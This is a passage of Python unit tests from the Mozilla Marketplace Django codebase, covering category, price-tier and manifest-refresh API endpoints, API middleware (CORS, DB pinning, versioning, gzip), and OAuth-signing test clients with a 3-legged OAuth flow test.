        eq_(data['id'], self.cat.pk)
    def test_get_categories(self):
        res = self.anon.get(self.list_url)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['name'], 'Webapp')
        eq_(data['objects'][0]['slug'], 'thewebapp')
    def test_get_category(self):
        res = self.anon.get(self.get_url)
        data = json.loads(res.content)
        eq_(data['name'], 'Webapp')
    def test_get_category_localised(self):
        # Accept-Language drives which translation is returned.
        res = self.anon.get(self.get_url, HTTP_ACCEPT_LANGUAGE='fr')
        data = json.loads(res.content)
        eq_(data['name'], 'Le Webapp')
        res = self.anon.get(self.get_url, HTTP_ACCEPT_LANGUAGE='en-US')
        data = json.loads(res.content)
        eq_(data['name'], 'Webapp')
    def test_get_other_category(self):
        # Non-webapp categories 404 through this endpoint.
        res = self.anon.get(reverse('app-category-detail',
                                    kwargs={'pk': self.other.pk}))
        eq_(res.status_code, 404)
class TestErrorReporter(TestCase):
    """The error-reporter view proxies client-side errors to Sentry."""
    @patch('django.conf.settings.SENTRY_DSN', 'http://a:b@FAKE_DSN.com/123')
    @patch('raven.base.Client.capture')
    def test_error_reporter_forwards_to_sentry(self, mock_client):
        sentry_data = {'message': 'Error!'}
        query_params = {'sentry_data': json.dumps(sentry_data)}
        path = '%s%s?%s' % (reverse('error-reporter'),
                            123,
                            urllib.urlencode(query_params))
        response = self.client.get(path)
        # 204: accepted with no body; the payload is forwarded verbatim.
        eq_(response.status_code, 204)
        mock_client.assert_called_with('raven.events.Exception',
                                       data=sentry_data)
MANIFEST = """
{"name": "Steamcubev2!",
"icons": {"128": "http://testmanifest.com/icon-128.png",
"48": "http://testmanifest.com/icon-48.png",
"16": "http://testmanifest.com/icon-16.png"},
"installs_allowed_from": ["*"],
"description":
"This app has been automatically generated by testmanifest.com",
"version": "1.0",
"developer": {"url": "http://mozilla.com", "name": "Mozilla Marketplace"}}
"""
@patch('mkt.developers.tasks._fetch_content')
@patch('mkt.webapps.tasks.validator')
class TestRefreshManifest(RestOAuth):
    """Tests for the endpoint that re-fetches a hosted app's manifest.

    The class-level patches apply to every test method; mocks are injected
    innermost-first, so each signature is (self, validator, fetch).
    """
    fixtures = fixture('user_2519', 'webapp_337141', 'platform_all')
    def setUp(self):
        super(TestRefreshManifest, self).setUp()
        self.url = reverse('app-refresh-manifest-detail',
                           kwargs={'pk': 337141})
    def test_anon(self, validator, fetch):
        # Anonymous users may not trigger a refresh.
        res = self.anon.post(self.url)
        eq_(res.status_code, 403)
        assert not fetch.called
    def test_non_owner(self, validator, fetch):
        res = self.client.post(self.url)
        eq_(res.status_code, 403)
        assert not fetch.called
    def test_refresh(self, validator, fetch):
        # Fake a successful validation run for whatever upload is created.
        validator.side_effect = lambda pk: setattr(
            FileUpload.objects.get(pk=pk), 'validation',
            json.dumps({'success': True, 'messages': []}))
        content = StringIO(MANIFEST)
        content.headers = {
            'Content-Type': 'application/x-web-app-manifest+json'}
        fetch.return_value = content
        AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
        res = self.client.post(self.url)
        eq_(res.status_code, 204)
        assert fetch.called
    def test_failed_refresh(self, validator, fetch):
        # A failed fetch is swallowed (still 204) and skips validation.
        fetch.side_effect = Exception
        AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
        res = self.client.post(self.url)
        eq_(res.status_code, 204)
        assert fetch.called
        assert not validator.called
    def test_no_packaged(self, validator, fetch):
        # Packaged apps have no remote manifest to refresh.
        AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
        Webapp.objects.filter(pk=337141).update(is_packaged=True)
        res = self.client.post(self.url)
        eq_(res.status_code, 400)
        eq_(res.json, {'reason': 'App is a packaged app.'})
class TestPriceTier(RestOAuth):
    """CRUD tests for price tiers; every write requires Prices:Edit."""
    fixtures = ['data/user_2519', 'data/admin'] + fixture('prices2')
    def setUp(self):
        self.permission = 'Prices:Edit'
        RestOAuth.setUp(self)
        self.list_url = reverse('price-tier-list')
        self.detail_url = reverse('price-tier-detail', kwargs={'pk': 1})
    def test_list(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.get(self.list_url)
        j = json.loads(res.content)
        eq_(len(j['objects']), 2)
        eq_(j['objects'][0], {
            'active': True,
            'name': '1',
            'price': '0.99',
            'method': 'operator+card',
            'resource_uri': self.detail_url
        })
    def test_detail(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.get(self.detail_url)
        j = json.loads(res.content)
        eq_(j, {
            'active': True,
            'name': '1',
            'price': '0.99',
            'method': 'operator+card',
            'resource_uri': self.detail_url
        })
    def test_post_unauthorized(self):
        # No Prices:Edit permission -> 403.
        res = self.client.post(self.list_url, '{}')
        eq_(res.status_code, 403)
    def test_post_admin(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.post(
            self.list_url,
            json.dumps({'name': '3',
                        'price': '3.14',
                        'method': 'operator+card',
                        'active': True}))
        eq_(res.status_code, 201)
        # 'operator+card' maps to the combined payment-method constant.
        p = Price.objects.get(pk=3)
        eq_(p.name, '3')
        eq_(p.price, Decimal('3.14'))
        eq_(p.method, amo.PAYMENT_METHOD_ALL)
        assert p.active
    def test_put_unauthorized(self):
        res = self.client.put(self.detail_url, '{}')
        eq_(res.status_code, 403)
    def test_put(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.put(
            self.detail_url,
            json.dumps({'name': '1',
                        'price': '0.10',
                        'method': 'operator',
                        'active': True}))
        eq_(res.status_code, 200)
        p = Price.objects.get(pk=1)
        eq_(p.name, '1')
        eq_(p.price, Decimal('0.10'))
        eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
        assert p.active
    def test_delete_unauthorized(self):
        res = self.client.delete(self.detail_url)
        eq_(res.status_code, 403)
    def test_delete(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.delete(self.detail_url)
        eq_(res.status_code, 204)
        assert not Price.objects.filter(pk=1).exists()
class TestPriceCurrency(RestOAuth):
    """CRUD tests for per-region price points; writes need Prices:Edit."""
    fixtures = ['data/user_2519', 'data/admin'] + fixture('prices2')
    def setUp(self):
        self.permission = 'Prices:Edit'
        RestOAuth.setUp(self)
        self.list_url = reverse('price-currency-list')
        self.detail_url = reverse('price-currency-detail', kwargs={'pk': 1})
        # PriceCurrency rows reference their tier by resource URI.
        self.tier_url = reverse('price-tier-detail', kwargs={'pk': 1})
    def test_list(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.get(self.list_url)
        j = json.loads(res.content)
        eq_(len(j['objects']), 8)
        eq_(j['objects'][0], {
            'carrier': None,
            'currency': 'PLN',
            'dev': True,
            'method': 'operator+card',
            'paid': True,
            'price': '5.01',
            'provider': 'bango',
            'region': 'pl',
            'resource_uri': self.detail_url,
            'tier': self.tier_url})
    def test_detail(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.get(self.detail_url)
        j = json.loads(res.content)
        eq_(j, {
            'carrier': None,
            'currency': 'PLN',
            'dev': True,
            'method': 'operator+card',
            'paid': True,
            'price': '5.01',
            'provider': 'bango',
            'region': 'pl',
            'resource_uri': self.detail_url,
            'tier': self.tier_url
        })
    def test_post_unauthorized(self):
        res = self.client.post(self.list_url, '{}')
        eq_(res.status_code, 403)
    def test_post_admin(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.post(
            self.list_url,
            json.dumps({
                'tier': self.tier_url,
                'carrier': None,
                'currency': 'PHP',
                'method': 'operator',
                'price': '10.05',
                'provider': 'bango',
                'region': 'pl',
                'paid': True,
                'dev': True}))
        eq_(res.status_code, 201)
        # Get the pk from the response.
        pk = res.json['resource_uri'].split('/')[-2]
        p = PriceCurrency.objects.get(pk=pk)
        eq_(p.tier_id, 1)
        eq_(p.price, Decimal('10.05'))
        eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
        eq_(p.currency, 'PHP')
    def test_put_unauthorized(self):
        res = self.client.put(self.detail_url, '{}')
        eq_(res.status_code, 403)
    def test_put(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.put(
            self.detail_url,
            json.dumps({
                'tier': self.tier_url,
                'carrier': None,
                'currency': 'USD',
                'method': 'operator',
                'price': '10.05',
                'provider': 'bango',
                'region': 'pl',
                'paid': True,
                'dev': False}))
        eq_(res.status_code, 200, res.content)
        p = PriceCurrency.objects.get(pk=1)
        eq_(p.tier_id, 1)
        eq_(p.price, Decimal('10.05'))
        eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
        eq_(p.currency, 'USD')
        # 'pl' is stored as its numeric region id (11).
        eq_(p.region, 11)
        eq_(p.paid, True)
        eq_(p.dev, False)
    def test_delete_unauthorized(self):
        res = self.client.delete(self.detail_url)
        eq_(res.status_code, 403)
    def test_delete(self):
        self.grant_permission(self.profile, self.permission)
        res = self.client.delete(self.detail_url)
        eq_(res.status_code, 204)
        assert not PriceCurrency.objects.filter(pk=1).exists()
class TestLargeTextField(TestCase):
    """LargeTextField stores raw text on write but serializes to a URL."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.request = Request(RequestFactory().get('/'))
    def test_receive(self):
        # Incoming writes keep the raw text in the native-value dict.
        data = 'privacy policy text'
        into = {}
        field = LargeTextField(view_name='app-privacy-policy-detail')
        field.context = {'request': self.request}
        field.field_from_native({'field_name': data}, None, 'field_name', into)
        eq_(into['field_name'], data)
    def test_send(self):
        # Outgoing reads serialize to the detail URL, not the text itself.
        app = Webapp.objects.get(pk=337141)
        app.privacy_policy = 'privacy policy text'
        field = LargeTextField(view_name='app-privacy-policy-detail')
        field.context = {'request': self.request}
        url = field.field_to_native(app, None)
        self.assertApiUrlEqual(url, '/apps/app/337141/privacy/')
########NEW FILE########
__FILENAME__ = test_middleware
from urlparse import parse_qs
from django.conf import settings
from django.core.cache import cache
from django.http import HttpResponse, HttpResponseServerError
from django.test.utils import override_settings
import mock
from multidb import this_thread_is_pinned
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from mkt.api.middleware import (APIFilterMiddleware, APIPinningMiddleware,
APITransactionMiddleware, APIVersionMiddleware,
CORSMiddleware, GZipMiddleware)
import mkt.regions
from mkt.site.middleware import RedirectPrefixedURIMiddleware
# Fake frontend origin used for the CORS origin-whitelisting tests.
fireplace_url = 'http://firepla.ce:1234'
class TestCORS(amo.tests.TestCase):
    """CORSMiddleware only emits CORS headers when request.CORS is set."""

    def setUp(self):
        self.mware = CORSMiddleware()
        self.req = RequestFactory().get('/')

    def _respond(self):
        # Run an empty response through the middleware for self.req.
        return self.mware.process_response(self.req, HttpResponse())

    def test_not_cors(self):
        # Without a request.CORS attribute no CORS headers appear at all.
        assert not self._respond().has_header('Access-Control-Allow-Methods')

    def test_cors(self):
        self.req.CORS = ['get']
        res = self._respond()
        eq_(res['Access-Control-Allow-Origin'], '*')
        eq_(res['Access-Control-Allow-Methods'], 'GET, OPTIONS')

    def test_post(self):
        self.req.CORS = ['get', 'post']
        res = self._respond()
        eq_(res['Access-Control-Allow-Methods'], 'GET, POST, OPTIONS')
        eq_(res['Access-Control-Allow-Headers'],
            'X-HTTP-Method-Override, Content-Type')

    @mock.patch.object(settings, 'FIREPLACE_URL', fireplace_url)
    def test_from_fireplace(self):
        # Requests originating from Fireplace get a specific origin plus
        # credentials support instead of the wildcard.
        self.req.CORS = ['get']
        self.req.META['HTTP_ORIGIN'] = fireplace_url
        res = self._respond()
        eq_(res['Access-Control-Allow-Origin'], fireplace_url)
        eq_(res['Access-Control-Allow-Methods'], 'GET, OPTIONS')
        eq_(res['Access-Control-Allow-Credentials'], 'true')
class TestTransactionMiddleware(amo.tests.TestCase):
    """Only /api/ requests enter transaction management."""
    def setUp(self):
        # RedirectPrefixedURIMiddleware sets request.API from the URL
        # prefix; the transaction middleware keys off that flag.
        self.prefix = RedirectPrefixedURIMiddleware()
        self.transaction = APITransactionMiddleware()
    def test_api(self):
        req = RequestFactory().get('/api/foo/')
        self.prefix.process_request(req)
        ok_(req.API)
    def test_not_api(self):
        req = RequestFactory().get('/not-api/foo/')
        self.prefix.process_request(req)
        ok_(not req.API)
    @mock.patch('django.db.transaction.enter_transaction_management')
    def test_transactions(self, enter):
        req = RequestFactory().get('/api/foo/')
        self.prefix.process_request(req)
        self.transaction.process_request(req)
        ok_(enter.called)
    @mock.patch('django.db.transaction.enter_transaction_management')
    def test_not_transactions(self, enter):
        req = RequestFactory().get('/not-api/foo/')
        self.prefix.process_request(req)
        self.transaction.process_request(req)
        ok_(not enter.called)
class TestPinningMiddleware(amo.tests.TestCase):
    """APIPinningMiddleware pins authenticated writers to the master DB.

    Write requests (and users recently seen writing, tracked via a cache
    key) are pinned so follow-up reads see their own writes.
    """
    def setUp(self):
        self.pin = APIPinningMiddleware()
        self.req = RequestFactory().get('/')
        self.req.API = True
        # Cache key is derived from the user id (42 below).
        self.key = 'api-pinning:42'
    def attach_user(self, anon=True):
        self.req.user = mock.Mock(id=42, is_anonymous=lambda: anon)
    def test_pinned_request_method(self):
        self.attach_user(anon=False)
        # Write verbs pin the thread; read (or unknown) verbs do not.
        for method in ['DELETE', 'PATCH', 'POST', 'PUT']:
            self.req.method = method
            self.pin.process_request(self.req)
            ok_(this_thread_is_pinned())
        for method in ['GET', 'HEAD', 'OPTIONS', 'POOP']:
            self.req.method = method
            self.pin.process_request(self.req)
            ok_(not this_thread_is_pinned())
    def test_pinned_cached(self):
        # A cached pin marker keeps the user pinned even on a GET.
        cache.set(self.key, 1, 5)
        self.attach_user(anon=False)
        self.pin.process_request(self.req)
        ok_(this_thread_is_pinned())
        cache.delete(self.key)
    def test_not_pinned(self):
        self.attach_user(anon=True)
        self.pin.process_request(self.req)
        ok_(not this_thread_is_pinned())
    def test_process_response_anon(self):
        # Anonymous writes never set the cache marker.
        self.attach_user(anon=True)
        self.req.method = 'POST'
        self.pin.process_response(self.req, HttpResponse())
        ok_(not cache.get(self.key))
    def test_process_response(self):
        self.attach_user(anon=False)
        for method in ['DELETE', 'PATCH', 'POST', 'PUT']:
            self.req.method = method
            self.pin.process_response(self.req, HttpResponse())
            ok_(cache.get(self.key))
            cache.delete(self.key)
        for method in ['GET', 'HEAD', 'OPTIONS', 'POOP']:
            self.req.method = method
            self.pin.process_response(self.req, HttpResponse())
            ok_(not cache.get(self.key))
    def pinned_header(self):
        # Helper (not a test): returns the API-Pinned response header.
        self.attach_user(anon=True)
        return self.pin.process_response(self.req, HttpResponse())['API-Pinned']
    @mock.patch('mkt.api.middleware.this_thread_is_pinned')
    def test_pinned_header_true(self, mock_pinned):
        mock_pinned.return_value = True
        eq_(self.pinned_header(), 'True')
    @mock.patch('mkt.api.middleware.this_thread_is_pinned')
    def test_pinned_header_false(self, mock_pinned):
        mock_pinned.return_value = False
        eq_(self.pinned_header(), 'False')
@override_settings(API_CURRENT_VERSION=2)
class TestAPIVersionMiddleware(amo.tests.TestCase):
    """API-Version / API-Status response headers per requested version."""
    def setUp(self):
        self.api_version_middleware = APIVersionMiddleware()
        self.prefix_middleware = RedirectPrefixedURIMiddleware()
    def response(self, url):
        # Run the prefix middleware first so request.API and the version
        # are populated, then collect whichever response is produced.
        req = RequestFactory().get(url)
        self.prefix_middleware.process_request(req)
        resp = self.api_version_middleware.process_request(req)
        if resp:
            return resp
        return self.api_version_middleware.process_response(req, HttpResponse())
    def header(self, res, header):
        return res.get(header, None)
    def test_non_api(self):
        # Non-API URLs carry no version headers at all.
        res1 = self.response('/foo/')
        eq_(self.header(res1, 'API-Version'), None)
        eq_(self.header(res1, 'API-Status'), None)
        res2 = self.response('/foo/')
        eq_(self.header(res2, 'API-Version'), None)
        eq_(self.header(res2, 'API-Status'), None)
    def test_version_not_specified(self):
        # Unversioned /api/ URLs are treated as (deprecated) v1.
        res = self.response('/api/')
        eq_(self.header(res, 'API-Version'), '1')
        eq_(self.header(res, 'API-Status'), 'Deprecated')
    def test_old_version(self):
        res = self.response('/api/v1/')
        eq_(self.header(res, 'API-Version'), '1')
        eq_(self.header(res, 'API-Status'), 'Deprecated')
    def test_current_version(self):
        res = self.response('/api/v2/')
        eq_(self.header(res, 'API-Version'), '2')
        eq_(self.header(res, 'API-Status'), None)
    def test_future_version(self):
        res = self.response('/api/v3/')
        eq_(self.header(res, 'API-Version'), '3')
        eq_(self.header(res, 'API-Status'), None)
    def test_no_api_version(self):
        # If no version was parsed, process_response falls back to the
        # current version from settings.
        req = RequestFactory().get('/api/v2/')
        req.API = True
        res = self.api_version_middleware.process_response(req, HttpResponse())
        eq_(self.header(res, 'API-Version'), '2')
        eq_(self.header(res, 'API-Status'), None)
class TestFilterMiddleware(amo.tests.TestCase):
    """APIFilterMiddleware advertises request filters via API-Filter."""
    def setUp(self):
        self.middleware = APIFilterMiddleware()
        self.factory = RequestFactory()
    def _header(self, url='/', api=True, region=mkt.regions.US, lang='en-US',
                gaia=True, tablet=True, mobile=True, pro='8a7d546c.32.1',
                response_cls=HttpResponse):
        # Build a fake request with the given filter attributes, run it
        # through the middleware, and return the parsed API-Filter header
        # (or None when the header must not be emitted).
        self.request = self.factory.get(url, {'pro': pro})
        self.request.API = api
        self.request.REGION = region
        self.request.LANG = lang or ''
        self.request.GAIA = gaia
        self.request.TABLET = tablet
        self.request.MOBILE = mobile
        res = self.middleware.process_response(self.request, response_cls())
        if api and response_cls.status_code < 500:
            header = res.get('API-Filter')
            # The response must Vary on API-Filter so caches key on it.
            assert 'vary' in res._headers
            eq_(res._headers['vary'][1], 'API-Filter')
            self._test_order(header)
            return parse_qs(header)
        else:
            assert 'vary' not in res._headers
            return None
    def _test_order(self, header):
        # Header parameters must be emitted in sorted order (stable cache
        # keys).
        order = [item.split('=')[0] for item in header.split('&')]
        eq_(order, sorted(order))
    @mock.patch('mkt.api.middleware.get_carrier')
    def test_success(self, gc):
        carrier = 'telerizon'
        gc.return_value = carrier
        header = self._header()
        self.assertIsInstance(header, dict)
        assert mkt.regions.US.slug in header['region']
        assert 'en-US' in header['lang']
        assert '8a7d546c.32.1' in header['pro']
        assert carrier in header['carrier']
        self.assertSetEqual(['gaia', 'mobile', 'tablet'], header['device'])
    def test_api_false(self):
        # Non-API responses get no filter header.
        header = self._header(api=False)
        eq_(header, None)
    def test_no_devices(self):
        header = self._header(gaia=False, tablet=False, mobile=False)
        assert 'device' not in header
    def test_one_device(self):
        header = self._header(gaia=True, tablet=False, mobile=False)
        self.assertSetEqual(['gaia'], header['device'])
    @mock.patch('mkt.api.middleware.get_carrier')
    def test_no_carrier(self, gc):
        gc.return_value = None
        header = self._header()
        assert 'carrier' not in header
    def test_region(self):
        region = mkt.regions.BR
        header = self._header(region=region)
        assert region.slug in header['region']
    def test_no_region(self):
        # A missing region is a programming error, not a valid state.
        with self.assertRaises(AttributeError):
            self._header(region=None)
    def test_lang(self):
        lang = 'pt-BR'
        header = self._header(lang=lang)
        assert lang in header['lang']
    def test_no_lang(self):
        header = self._header(lang=None)
        assert 'lang' not in header
    def test_500(self):
        # Server errors skip the header entirely (checked inside _header).
        self._header(response_cls=HttpResponseServerError)
class TestGzipMiddleware(amo.tests.TestCase):
    """Our GZipMiddleware wrapper compresses API responses only."""

    @mock.patch('django.middleware.gzip.GZipMiddleware.process_response')
    def test_enabled_for_api(self, django_gzip_middleware):
        fake_request = mock.Mock()
        fake_request.API = True
        GZipMiddleware().process_response(fake_request, mock.Mock())
        ok_(django_gzip_middleware.called)

    @mock.patch('django.middleware.gzip.GZipMiddleware.process_response')
    def test_disabled_for_the_rest(self, django_gzip_middleware):
        fake_request = mock.Mock()
        fake_request.API = False
        GZipMiddleware().process_response(fake_request, mock.Mock())
        ok_(not django_gzip_middleware.called)

    def test_settings(self):
        # Gzip must be first in the list so it runs *last* during
        # process_response and compresses the final, fully-built body.
        eq_(settings.MIDDLEWARE_CLASSES[0],
            'mkt.api.middleware.GZipMiddleware')
########NEW FILE########
__FILENAME__ = test_oauth
import json
import urllib
import urlparse
from datetime import datetime
from functools import partial
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test.client import Client, FakePayload
from django.utils.encoding import iri_to_uri, smart_str
from django_browserid.tests import mock_browserid
from nose.tools import eq_
from oauthlib import oauth1
from pyquery import PyQuery as pq
from rest_framework.request import Request
from test_utils import RequestFactory
from amo.helpers import absolutify, urlparams
from amo.tests import TestCase
from mkt.api import authentication
from mkt.api.middleware import RestOAuthMiddleware
from mkt.api.models import Access, ACCESS_TOKEN, generate, REQUEST_TOKEN, Token
from mkt.api.tests import BaseAPI
from mkt.site.fixtures import fixture
from users.models import UserProfile
def get_absolute_url(url, api_name='apps', absolute=True):
    # Gets an absolute url, except where you don't want that.
    # `url` is a (urlname, kwargs[, query_params]) tuple/list spec.
    # NOTE(review): mutates url[1] in place by injecting 'api_name' —
    # callers appear to pass throwaway specs, but confirm before reusing
    # a spec across calls.
    url[1]['api_name'] = api_name
    res = reverse(url[0], kwargs=url[1])
    if absolute:
        res = urlparse.urljoin(settings.SITE_URL, res)
    if len(url) > 2:
        # Optional third element: query-string parameters.
        res = urlparams(res, **url[2])
    return res
def wrap(response):
    """Attach a lazy ``json`` property to *response*'s class and return it.

    The property parses ``response.content`` as JSON (caching the parsed
    value on the instance) whenever the response has content and an
    ``application/json`` content type; otherwise it yields ``None``.
    """
    def _json(self):
        """Will return parsed JSON on response if there is any."""
        is_json = self.content and 'application/json' in self['Content-Type']
        if not is_json:
            return None
        if not hasattr(self, '_content_json'):
            self._content_json = json.loads(self.content)
        return self._content_json

    cls = response.__class__
    # Install the property once per response class.
    if not hasattr(cls, 'json'):
        cls.json = property(_json)
    return response
class OAuthClient(Client):
    """
    OAuthClient can do all the requests the Django test client,
    but even more. And it can magically sign requests.
    TODO (andym): this could be cleaned up and split out, it's useful.
    """
    signature_method = oauth1.SIGNATURE_HMAC

    def __init__(self, access, api_name='apps'):
        # `access` is the OAuth consumer credentials; None means anonymous.
        super(OAuthClient, self).__init__(self)
        self.access = access
        self.get_absolute_url = partial(get_absolute_url,
                                        api_name=api_name)

    def login(self, username, password):
        # Bypass real BrowserID verification while logging in.
        with mock_browserid(email=username):
            return super(OAuthClient, self).login(username=username,
                                                  password=password)

    def sign(self, method, url):
        """Return (url, headers, body) with an OAuth 1.0 signature applied.

        Anonymous clients (no credentials) get the url back untouched with
        empty headers/body.
        """
        if not self.access:
            return url, {}, ''
        cl = oauth1.Client(self.access.key,
                           client_secret=self.access.secret,
                           signature_method=self.signature_method)
        url, headers, body = cl.sign(url, http_method=method)
        # We give cl.sign a str, but it gives us back a unicode, which cause
        # double-encoding problems later down the road with the django test
        # client. To fix that, ensure it's still an str after signing.
        return smart_str(url), headers, body

    def kw(self, headers, **kw):
        # Default request environ: host plus the signed Authorization header.
        kw.setdefault('HTTP_HOST', 'testserver')
        kw.setdefault('HTTP_AUTHORIZATION', headers.get('Authorization', ''))
        return kw

    def get(self, url, data=None, **kw):
        # BUGFIX: `data` used to default to a shared mutable {} (classic
        # Python default-argument pitfall); None behaves identically here.
        if isinstance(url, tuple) and len(url) > 2 and data:
            raise RuntimeError('Query string specified both in urlspec and as '
                               'data arg. Pick one or the other.')
        urlstring = self.get_absolute_url(url)
        if data:
            urlstring = '?'.join([urlstring,
                                  urllib.urlencode(data, doseq=True)])
        url, headers, _ = self.sign('GET', urlstring)
        return wrap(super(OAuthClient, self)
                    .get(url, **self.kw(headers, **kw)))

    def delete(self, url, data=None, **kw):
        # BUGFIX: same mutable-default fix as get().
        if isinstance(url, tuple) and len(url) > 2 and data:
            raise RuntimeError('Query string specified both in urlspec and as '
                               'data arg. Pick one or the other.')
        urlstring = self.get_absolute_url(url)
        if data:
            urlstring = '?'.join([urlstring,
                                  urllib.urlencode(data, doseq=True)])
        url, headers, _ = self.sign('DELETE', urlstring)
        return wrap(super(OAuthClient, self)
                    .delete(url, **self.kw(headers, **kw)))

    def post(self, url, data='', content_type='application/json', **kw):
        url, headers, _ = self.sign('POST', self.get_absolute_url(url))
        return wrap(super(OAuthClient, self).post(url, data=data,
                                                  content_type=content_type,
                                                  **self.kw(headers, **kw)))

    def put(self, url, data='', content_type='application/json', **kw):
        url, headers, body = self.sign('PUT', self.get_absolute_url(url))
        return wrap(super(OAuthClient, self).put(url, data=data,
                                                 content_type=content_type,
                                                 **self.kw(headers, **kw)))

    def patch(self, url, data='', **kw):
        # Older Django test clients lack patch(); build the WSGI environ by
        # hand and dispatch through request().
        url, headers, body = self.sign('PATCH', self.get_absolute_url(url))
        parsed = urlparse.urlparse(url)
        kw.update(**self.kw(headers, **{
            'CONTENT_LENGTH': len(data),
            'CONTENT_TYPE': 'application/json',
            'PATH_INFO': urllib.unquote(parsed[2]),
            'REQUEST_METHOD': 'PATCH',
            'wsgi.input': FakePayload(data),
        }))
        response = self.request(**kw)
        return response

    def options(self, url):
        url, headers, body = self.sign('OPTIONS', self.get_absolute_url(url))
        return wrap(super(OAuthClient, self).options(url, **self.kw(headers)))
class BaseOAuth(BaseAPI):
    """API test base providing a signed (`client`) and an anonymous
    (`anon`) OAuth client for the legacy endpoints."""
    fixtures = fixture('user_2519', 'group_admin', 'group_editor',
                       'group_support')
    def setUp(self, api_name='apps'):
        self.profile = self.user = UserProfile.objects.get(pk=2519)
        # Mark the dev agreement as read so API access isn't blocked.
        self.profile.update(read_dev_agreement=datetime.now())
        self.access = Access.objects.create(key='oauthClientKeyForTests',
                                            secret=generate(),
                                            user=self.user)
        self.client = OAuthClient(self.access, api_name=api_name)
        self.anon = OAuthClient(None, api_name=api_name)
class RestOAuthClient(OAuthClient):
    """OAuth client for the DRF endpoints, which take plain URL strings
    instead of (urlname, kwargs) tuples."""
    def __init__(self, access):
        # NOTE(review): intentionally calls OAuthClient's *parent* __init__
        # (super(OAuthClient, ...)), skipping the api_name plumbing that
        # plain-URL endpoints don't need — confirm before refactoring.
        super(OAuthClient, self).__init__(self)
        self.access = access
    def get_absolute_url(self, url):
        unquoted_url = urlparse.unquote(url)
        return absolutify(iri_to_uri(unquoted_url))
class RestOAuth(BaseOAuth):
    """Like BaseOAuth but wires up RestOAuthClient for the DRF API."""
    fixtures = fixture('user_2519')
    def setUp(self):
        self.profile = self.user = UserProfile.objects.get(pk=2519)
        # Mark the dev agreement as read so API access isn't blocked.
        self.profile.update(read_dev_agreement=datetime.now())
        self.access = Access.objects.create(key='oauthClientKeyForTests',
                                            secret=generate(),
                                            user=self.user)
        self.client = RestOAuthClient(self.access)
        self.anon = RestOAuthClient(None)
class Test3LeggedOAuthFlow(TestCase):
    """End-to-end tests for the 3-legged OAuth 1.0a flow:
    request token -> user authorization -> access token -> signed request.
    """
    fixtures = fixture('user_2519', 'user_999')
    def setUp(self, api_name='apps'):
        # User 2519 owns the OAuth consumer; user 999 plays the resource
        # owner who grants access.
        self.profile = self.user = UserProfile.objects.get(pk=2519)
        self.user2 = UserProfile.objects.get(pk=999)
        self.profile.update(read_dev_agreement=datetime.now())
        self.app_name = 'Mkt Test App'
        self.redirect_uri = 'https://example.com/redirect_target'
        self.access = Access.objects.create(key='oauthClientKeyForTests',
                                            secret=generate(),
                                            user=self.user,
                                            redirect_uri=self.redirect_uri,
                                            app_name=self.app_name)
    def _oauth_request_info(self, url, **kw):
        # Sign `url` with oauthlib and return it plus the Authorization
        # header to attach to the request.
        oa = oauth1.Client(signature_method=oauth1.SIGNATURE_HMAC, **kw)
        url, headers, _ = oa.sign(url, http_method='GET')
        return url, headers['Authorization']
    def test_use_access_token(self):
        url = absolutify(reverse('app-list'))
        t = Token.generate_new(ACCESS_TOKEN, creds=self.access,
                               user=self.user2)
        url, auth_header = self._oauth_request_info(
            url, client_key=self.access.key, client_secret=self.access.secret,
            resource_owner_key=t.key, resource_owner_secret=t.secret)
        auth = authentication.RestOAuthAuthentication()
        req = RequestFactory().get(
            url, HTTP_HOST='testserver',
            HTTP_AUTHORIZATION=auth_header)
        req.API = True
        RestOAuthMiddleware().process_request(req)
        # A valid access token authenticates as the resource owner.
        assert auth.authenticate(Request(req))
        eq_(req.user, self.user2)
    def test_bad_access_token(self):
        url = absolutify(reverse('app-list'))
        Token.generate_new(ACCESS_TOKEN, creds=self.access, user=self.user2)
        # Sign with random credentials instead of the real token.
        url, auth_header = self._oauth_request_info(
            url, client_key=self.access.key,
            client_secret=self.access.secret, resource_owner_key=generate(),
            resource_owner_secret=generate())
        auth = authentication.RestOAuthAuthentication()
        req = RequestFactory().get(
            url, HTTP_HOST='testserver',
            HTTP_AUTHORIZATION=auth_header)
        req.API = True
        RestOAuthMiddleware().process_request(req)
        assert not auth.authenticate(Request(req))
    def test_get_authorize_page(self):
        t = Token.generate_new(REQUEST_TOKEN, self.access)
        self.client.login(username='[email protected]', password='password')
        res = self.client.get('/oauth/authorize/', data={'oauth_token': t.key})
        eq_(res.status_code, 200)
        page = pq(res.content)
        # The request token is echoed back in the approval form.
        eq_(page('input[name=oauth_token]').attr('value'), t.key)
    def test_get_authorize_page_bad_token(self):
        self.client.login(username='[email protected]', password='password')
        res = self.client.get('/oauth/authorize/',
                              data={'oauth_token': 'bad_token_value'})
        eq_(res.status_code, 401)
    def test_post_authorize_page(self):
        t = Token.generate_new(REQUEST_TOKEN, self.access)
        full_redirect = (
            self.redirect_uri + '?oauth_token=%s&oauth_verifier=%s'
            % (t.key, t.verifier))
        self.client.login(username='[email protected]', password='password')
        url = reverse('mkt.developers.oauth_authorize')
        res = self.client.post(url, data={'oauth_token': t.key, 'grant': ''})
        # Granting redirects to the consumer with token + verifier and
        # binds the request token to the authorizing user (999).
        eq_(res.status_code, 302)
        eq_(res.get('location'), full_redirect)
        eq_(Token.objects.get(pk=t.pk).user.pk, 999)
    def test_access_request(self):
        t = Token.generate_new(REQUEST_TOKEN, self.access)
        url = urlparse.urljoin(settings.SITE_URL,
                               reverse('mkt.developers.oauth_access_request'))
        url, auth_header = self._oauth_request_info(
